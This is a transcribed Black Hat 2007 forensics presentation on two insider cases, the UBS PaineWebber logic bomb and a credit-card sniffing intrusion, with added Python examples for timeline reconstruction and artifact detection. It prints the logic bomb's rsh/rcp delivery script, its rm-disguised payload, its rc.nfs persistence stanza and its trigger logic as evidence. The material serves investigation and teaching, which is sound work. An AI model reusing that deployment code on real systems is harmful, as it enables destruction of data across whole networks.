
Smoke ’em Out, Black Hat Las Vegas 2007, Rohyt Belani, Keith Jones (PowerPoint PPT Presentation)



  1. Smoke ’em Out, Black Hat Las Vegas 2007, Rohyt Belani, Keith Jones

  2. Intrepidus Group
     - Information security consulting company
     - Services include: Application Security, Network Security, Mobile Security
     - Located in Chantilly, VA & NYC
     - Internationally acclaimed experts: presented at Black Hat, DefCon, Hack In The Box, OWASP; written articles for SecurityFocus, SC Magazine; quoted in Forbes, InformationWeek, Hacker Japan, BBC UK, Industry Week, OptimizeMag

  3. Jones, Rose, Dykstra and Associates
     - Founded in January 2007
     - We specialize in: e-Discovery Services, Incident Response, Government Services, Computer Security Training
     - Located in Columbia, MD

  4. Insider “Hacks”: Investigation Challenges
     - Hacker has deep system knowledge
     - Minimal footprint of attack: no port scanning activity
     - Logs may be altered or deleted
     - Little to no evidence of a “break in”
     - Hacker may be “in” on the investigation!

  5. United States vs. Roger Duronio

  6. Overview
     - The Victim: UBS PaineWebber (UBS-PW)
     - The Defendant: Roger Duronio
     - The Crime: November 2001 – March 4, 2002. A Logic Bomb on over 1,000 UBS-PW Computer Systems Deleted the File System on March 4, 2002 at 9:30 AM
     - The Loss: $3,146,289 Spent on Clean Up Efforts

  7. The Defendant
     - Roger Duronio
     - Unix Systems Administrator for UBS-PW
     - Received less in yearly bonuses than he anticipated
     - Bought UBS PUT Options due to Expire in Mid March, 2002 (makes money if the stock loses value)

  8. The Investigation
     - March 4, 2002 through July 2006
     - U.S. Secret Service, Special Agent O’Neil, Lead Investigator, Morristown, NJ
     - U.S. Assistant Attorneys Mauro Wolfe and V. Grady O’Malley, Newark, NJ
     - Keith J. Jones, Computer Forensic and Computer Security Expert Witness for the Government

  9. The Indictment
     1. Securities Fraud
     2. Computer Use During the Fraud
     3. Mail Fraud #1
     4. Mail Fraud #2

  10. The Evidence
     - 20 Backup Tapes from Relevant Servers: AIX, Solaris, VPN Logs
     - 1 @Stake Report from the Initial Response
     - 70+ Tapes from the Affected Branch Servers (16 Analyzed)
     - 4 EnCase Images of Duronio’s Home Computer Systems
     - 1 Hard Copy of the Logic Bomb found on Duronio’s Bedroom Dresser

  11. Logic Bomb Components
     - Trigger Mechanism
     - Payload
     - Delivery Mechanism
     - Persistence Mechanism

  12. Trigger Mechanism: The Trigger Runs Continuously and Waits for an Event. Once the Event Occurs, the Trigger Executes the Logic Bomb’s Payload.

  13. Trigger Mechanism (flowchart)
     - Is it March, April, or May? N: Sleep 864,000 Seconds (10 Days), then re-check. Y: next step.
     - Is it Monday? N: Sleep 86,400 Seconds (1 Day), then re-check. Y: next step.
     - Is it later or equal to 9:00 AM? N: Sleep 3600 Seconds (1 Hour), then re-check. Y: next step.
     - Is it later or equal to 9:30 AM? N: Sleep 60 Seconds (1 Minute), then re-check. Y: next step.
     - Delete Every File

  14. Trigger Mechanism (same flowchart as slide 13), with callout: “RPC.LOGD” was Discovered on the SA Host. The Original Source Code Name Was “wait_tst.c”.
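As an added example (not code from the presentation or from the case file), the flowchart’s timing logic in Python with the payload replaced by a return value, so an analyst can reconstruct the firing schedule that the expert conclusion on slide 33 states (9:30 a.m. on Monday, March 4, 2002 and every Monday in March, April and May). The sleep intervals are the slide’s; modelling a restart after each firing by advancing the clock one day is my assumption.

```python
from datetime import datetime, timedelta, time

# Sleep intervals from the flowchart (seconds).
SLEEP_WRONG_MONTH = 864_000   # 10 days: not March, April or May
SLEEP_WRONG_DAY = 86_400      # 1 day: not Monday
SLEEP_BEFORE_0900 = 3_600     # 1 hour: before 9:00 AM
SLEEP_BEFORE_0930 = 60        # 1 minute: before 9:30 AM

def trigger_step(now):
    """One pass through the decision tree. Returns ("sleep", seconds) or
    ("fire", 0). The payload is not modelled; only the timing is."""
    if now.month not in (3, 4, 5):
        return "sleep", SLEEP_WRONG_MONTH
    if now.weekday() != 0:            # Monday == 0
        return "sleep", SLEEP_WRONG_DAY
    if now.time() < time(9, 0):
        return "sleep", SLEEP_BEFORE_0900
    if now.time() < time(9, 30):
        return "sleep", SLEEP_BEFORE_0930
    return "fire", 0

def firing_schedule(start, end):
    """Run a simulated clock from start to end and collect every instant the
    trigger would fire. Assumption (mine): after a firing the host is rebuilt
    and the persistence mechanism restarts the trigger, modelled by moving the
    clock forward one day, which is why later Mondays appear as well."""
    fired, now = [], start
    while now < end:
        action, secs = trigger_step(now)
        if action == "fire":
            fired.append(now)
            now += timedelta(days=1)
        else:
            now += timedelta(seconds=secs)
    return fired

if __name__ == "__main__":
    for t in firing_schedule(datetime(2002, 2, 1), datetime(2002, 6, 30)):
        print(t.strftime("%A %Y-%m-%d %H:%M"))
```

Note that the "later or equal" comparisons mean a trigger started after 9:30 on a qualifying Monday fires at once rather than waiting a week.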

  15. Logic Bomb Components (Trigger Mechanism, Payload, Delivery Mechanism, Persistence Mechanism)

  16. Payload: The Payload of a Logic Bomb was the Unix Remove (“rm”) Command Disguised as “mrm”. (Exhibit 721)

  17. Logic Bomb Components (Trigger Mechanism, Payload, Delivery Mechanism, Persistence Mechanism)

  18. Delivery Mechanism: A Delivery Mechanism is Used to Distribute and Install a Logic Bomb on Multiple Remote Computers Nationwide.

  19. Delivery Mechanism: RSH_SCAN2.KSH (the slide’s callouts are reproduced as comments)

```ksh
for i in `cat ll_l`
do
  rcp /usr/sbin/rpc.logd $i:/usr/sbin/rpc.logd                    # Delivers Trigger
  rcp /usr/sbin/rpc.logd $i:/usr/sbin/syschg
  rcp llines $i:/tmp/llines                                        # Delivers Persistence Mechanism
  rsh $i 'cat /etc/rc.nfs /tmp/llines >/tmp/rc.nfs'
  rsh $i mv /tmp/rc.nfs /etc/rc.nfs
  rsh $i cp /usr/bin/rm /usr/sbin/mrm                              # Creates the Payload
  rsh $i "nohup /usr/sbin/rpc.logd </dev/null >/dev/null 2>&1 &"   # Installs Logic Bomb, Twice
  rsh $i 'echo /usr/bin/syschg | at -t 200203010930'
done
exit
```

  20. Logic Bomb Components (Trigger Mechanism, Payload, Delivery Mechanism, Persistence Mechanism)

  21. Persistence Mechanism: A Persistence Mechanism Assures that a Logic Bomb Always Executes Upon Restart.

  22. Persistence Mechanism: The Persistence Mechanism is Hidden in the RC.NFS Startup Script.

```sh
if [ -x /usr/sbin/rpc.logd ]; then
        start rpc.logd /usr/sbin/rpc.logd
fi
```
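An added example (not from the presentation or the case file) of hunting, on a collected filesystem, for the two artifacts slides 16 and 22 describe: a binary byte-identical to rm under another name, and a start stanza in rc.nfs whose path is not in a known-good baseline. The directory layout, file contents and baseline set are constructed stand-ins.

```python
import hashlib
import os
import re
import tempfile

def sha256_of(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def disguised_copies(system_binaries, search_dirs):
    """Report files under search_dirs that are byte-identical to a known
    system binary but carry a different name (the rm -> mrm trick)."""
    known = {sha256_of(p): p for p in system_binaries}
    hits = []
    for d in search_dirs:
        for name in sorted(os.listdir(d)):
            path = os.path.join(d, name)
            if not os.path.isfile(path):
                continue
            orig = known.get(sha256_of(path))
            if orig and os.path.basename(orig) != name:
                hits.append((path, orig))
    return hits

START_RE = re.compile(r"^\s*start\s+(\S+)\s+(\S+)", re.M)

def unexpected_startups(rc_text, baseline):
    """From 'start <name> <path>' lines in an rc.nfs-style script, return the
    (name, path) pairs whose path is not in the known-good baseline."""
    return [(n, p) for n, p in START_RE.findall(rc_text) if p not in baseline]

def demo():
    """Constructed miniature of the artifacts: a copied rm and an rc.nfs with
    one extra stanza. Returns both check results for the caller to inspect."""
    root = tempfile.mkdtemp()
    bin_dir, sbin_dir = os.path.join(root, "bin"), os.path.join(root, "sbin")
    os.mkdir(bin_dir); os.mkdir(sbin_dir)
    rm_bytes = b"\x7fELF-constructed-rm-stand-in"
    files = {("bin", "rm"): rm_bytes, ("sbin", "mrm"): rm_bytes,   # disguised copy
             ("sbin", "rpc.logd"): b"\x7fELF-constructed-other"}
    for (d, n), data in files.items():
        with open(os.path.join(root, d, n), "wb") as f:
            f.write(data)
    rc_nfs = ("if [ -x /usr/sbin/rpc.lockd ]; then\n        start rpc.lockd /usr/sbin/rpc.lockd\nfi\n"
              "if [ -x /usr/sbin/rpc.logd ]; then\n        start rpc.logd /usr/sbin/rpc.logd\nfi\n")
    baseline = {"/usr/sbin/rpc.lockd", "/usr/sbin/rpc.statd", "/usr/sbin/rpc.mountd"}
    return disguised_copies([os.path.join(bin_dir, "rm")], [sbin_dir]), unexpected_startups(rc_nfs, baseline)
```

On a real image, point system_binaries at the known-good tools and search_dirs at every directory on the PATH and in the startup scripts; the hash comparison is what defeats the rename.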

  23. What Did We Find?

  24. Diagram: where the evidence came from. The UBS PaineWebber employee’s residence connects through Verizon (Verizon Session Logs) to the UBS PaineWebber VPN (VPN Logs; login prompt “User: re01645 Password: ******”) and on to host ICSDEV02, where WTMP Logs and SU Logs were collected.

  25. Verizon Session Logs
     - Username
     - User’s Home IP Address
     - Start of Session
     - End of Session
     - User Home Address

  26. Annotated Verizon session log record: Username; User’s Home IP Address; User’s Home Address and Telephone Number; Start Time (8:24 AM); End Time (11:08 PM)

  27. VPN Logs
     - Connection Time
     - UBS PaineWebber Employee’s Username
     - UBS PaineWebber Employee’s Home IP Address
     - UBS PaineWebber Server IP Address

  28. Annotated VPN log record: Connection Time (1:29 AM); UBS PaineWebber Employee’s Username; UBS PaineWebber Employee’s Home IP Address; UBS PaineWebber’s Server IP Address (DEV02)

  29. WTMP Logs
     - Username
     - Source IP Address
     - Session Start Time
     - Session End Time
     - Session Time Length

  30. Annotated WTMP excerpt (source hosts dev02 and The VPN Gateway):
     - rduronio successfully logs into the SA Host from the VPN Gateway from 3:08 PM through 3:47 PM
     - rduronio successfully logs into the SA Host from DEV02 from 3:40 PM through 3:43 PM

  31. Switch User (SU) Logs
     - Time of Switch
     - Original Username
     - Resulting Username

  32. Annotated SU log record: Time of Switch (3:09 PM); Original Username; Resulting Username
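An added example, not from the presentation or the case file, that walks the four log sources of slides 24 to 32 in the order the diagram shows: from a login in WTMP back through the VPN log to the ISP session behind it, and forward to the su events inside that login. All records, usernames and addresses are constructed samples; the field order in each list follows the slides.

```python
from datetime import datetime as dt

# Constructed sample records, one list per log source, with the fields the
# slides list for that source. None of these values come from the case.
ISP_SESSIONS = [   # Verizon session logs: username, home IP, start, end
    ("isp-sub-17", "198.51.100.7", dt(2002, 2, 22, 8, 24), dt(2002, 2, 22, 23, 8)),
    ("isp-sub-42", "198.51.100.9", dt(2002, 2, 22, 9, 0), dt(2002, 2, 22, 12, 0)),
]
VPN_LOG = [        # VPN logs: connection time, corp username, home IP, server IP
    (dt(2002, 2, 22, 15, 5), "emp01", "198.51.100.7", "10.0.0.2"),
    (dt(2002, 2, 22, 10, 0), "emp02", "198.51.100.9", "10.0.0.2"),
]
WTMP = [           # WTMP logs on the SA host: username, source IP, start, end
    ("emp01", "10.0.0.2", dt(2002, 2, 22, 15, 8), dt(2002, 2, 22, 15, 47)),
    ("emp02", "10.0.0.1", dt(2002, 2, 22, 10, 2), dt(2002, 2, 22, 10, 30)),
]
SU_LOG = [         # SU logs on the SA host: time, original username, resulting username
    (dt(2002, 2, 22, 15, 9), "emp01", "root"),
    (dt(2002, 2, 22, 16, 0), "emp01", "root"),   # after the session ended: not attributable to it
]
VPN_GATEWAY = "10.0.0.2"   # source IP that WTMP shows for logins arriving via the VPN

def trace_login(wtmp_rec):
    """Tie one SA-host login to the su events inside it, to the VPN connection
    that carried it, and to the ISP subscriber session behind that connection.
    Each link stays None when the logs cannot support it."""
    user, src, start, end = wtmp_rec
    chain = {"login": wtmp_rec, "vpn": None, "isp": None,
             "su": [s for s in SU_LOG if s[1] == user and start <= s[0] <= end]}
    if src != VPN_GATEWAY:
        return chain                  # direct login: no VPN or ISP hop to walk
    # Latest VPN connection by the same corporate username opened before the login
    cands = [v for v in VPN_LOG if v[1] == user and v[3] == VPN_GATEWAY and v[0] <= start]
    if not cands:
        return chain
    chain["vpn"] = vpn = max(cands, key=lambda v: v[0])
    # ISP session that held the VPN connection's home IP at the connection time
    chain["isp"] = next((s for s in ISP_SESSIONS
                         if s[1] == vpn[2] and s[2] <= vpn[0] <= s[3]), None)
    return chain

if __name__ == "__main__":
    for rec in WTMP:
        print(trace_login(rec))
```

Clock skew between the four sources is the usual trap; on a real case, normalise every timestamp to one time zone and widen the windows by the observed offset before joining.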

  33. Expert Conclusions
     1. The Forensic Examination Revealed the Existence of the Trigger Mechanism of a Logic Bomb on Two of Roger Duronio’s Home Computers (the “Duronio Trigger”). The Duronio Trigger Would Cause a Logic Bomb to Delete all Files on a Computer at 9:30 a.m. on Monday, March 4, 2002, and at 9:30 a.m. every Monday in March, April, and May 2002.

  34. Expert Conclusions
     2. The Forensic Examination Revealed that a Logic Bomb, Containing the Duronio Trigger, was Distributed and Intentionally Installed on over 1,000 Computers Nationwide within the UBS PaineWebber Computer Network.

  35. Expert Conclusions
     3. The Forensic Examination Revealed that at 9:30 a.m. on Monday, March 4, 2002, the Logic Bomb Executed and Began Deleting Every File on over 1,000 Computers Nationwide within the UBS PaineWebber Computer Network.

  36. Expert Conclusions
     4. The Forensic Examination Revealed that Roger Duronio’s Usernames and Home Computers were Directly Linked to the Creation, Modification, Distribution, Installation, and Execution of the Logic Bomb on over 1,000 Computers Nationwide within the UBS PaineWebber Computer Network.

  37. The Verdict?
     1. Securities Fraud: GUILTY
     2. Computer Use During the Fraud: GUILTY
     3. Mail Fraud #1: NOT GUILTY
     4. Mail Fraud #2: NOT GUILTY

  38. The Sentence? Roger Duronio was sentenced to 97 months in jail, which was the maximum he could receive.

  39. The Phantom Insider

  40. Symptoms
     - An employee of a retail company, on the corporate network, cannot access e-mail
     - The IT guy finds the following:
       - Unable to ping the mail server from the employee’s workstation
       - Virtual network adapter with IP address 10.8.0.5
       - Ethernet address is 10.1.0.205
       - Mail server IP: 10.8.0.2
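As an added example, not part of the presentation: the symptoms on slide 40 put the virtual adapter (10.8.0.5) and the mail server (10.8.0.2) in the same /24 if both use a /24 mask, which would send mail traffic into the tunnel instead of out the Ethernet adapter. The masks, the default route on Ethernet and the inventory set are my assumptions; the slide gives only the addresses.

```python
import ipaddress

# Constructed adapter table modelled on slide 40: a physical adapter at
# 10.1.0.205 and a virtual (tunnel) adapter at 10.8.0.5. The /24 masks and the
# default route on Ethernet are assumptions; the slide lists only addresses.
ADAPTERS = [
    ("Ethernet", ipaddress.ip_interface("10.1.0.205/24")),
    ("Virtual", ipaddress.ip_interface("10.8.0.5/24")),
]
DEFAULT_ROUTE_ADAPTER = "Ethernet"
MAIL_SERVER = "10.8.0.2"

def adapter_for(dest, adapters=ADAPTERS, default=DEFAULT_ROUTE_ADAPTER):
    """Longest-prefix match over directly connected networks: the adapter
    that would carry traffic to dest, or the default-route adapter."""
    dest = ipaddress.ip_address(dest)
    best = None
    for name, iface in adapters:
        if dest in iface.network and (best is None or
                                      iface.network.prefixlen > best[1].network.prefixlen):
            best = (name, iface)
    return best[0] if best else default

def unexpected_adapters(inventory, adapters=ADAPTERS):
    """Adapters present on the host but absent from the asset inventory."""
    return [name for name, _ in adapters if name not in inventory]

def triage():
    """The two questions slide 40 raises: where does mail traffic go, and
    which adapter should not be on this workstation at all?"""
    return adapter_for(MAIL_SERVER), unexpected_adapters({"Ethernet"})

if __name__ == "__main__":
    print(triage())
```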

  41. Deeper Investigation
     - OpenVPN service running on the machine
     - Spurious connections to the outside world

  42. Deeper Investigation
     - Running “net use” shows that the C$ share of a server in the credit processing network has been successfully mapped
     - Netbios connections from the store network

  43. Deeper Investigation
     - Firewall rule-set honing efforts under way
     - Extensive logging enabled on both: Store to Corporate Network Firewall; Corporate Network to Credit Processing Network Firewall
     - No port scanning activity!
     - Connections from victim to 1 of 3 credit card processing servers visible

  44. Time Out: What do we know so far?
     - Attack originated from a store network
     - Compromised an employee workstation
     - Netbios connection established to victim workstation
     - Workstation has OpenVPN connection to IP address in a foreign country
     - Workstation also established connection to a credit card processing server

  45. Investigation Continues… What did the attacker do on the credit card processing server?
     - Sniffed on specific TCP ports related to a specific credit processing system
     - Captured credit transactions in transit and stored them on flat files
     - Transferred flat files to victim workstation for transmission via the OpenVPN connection to the outside world
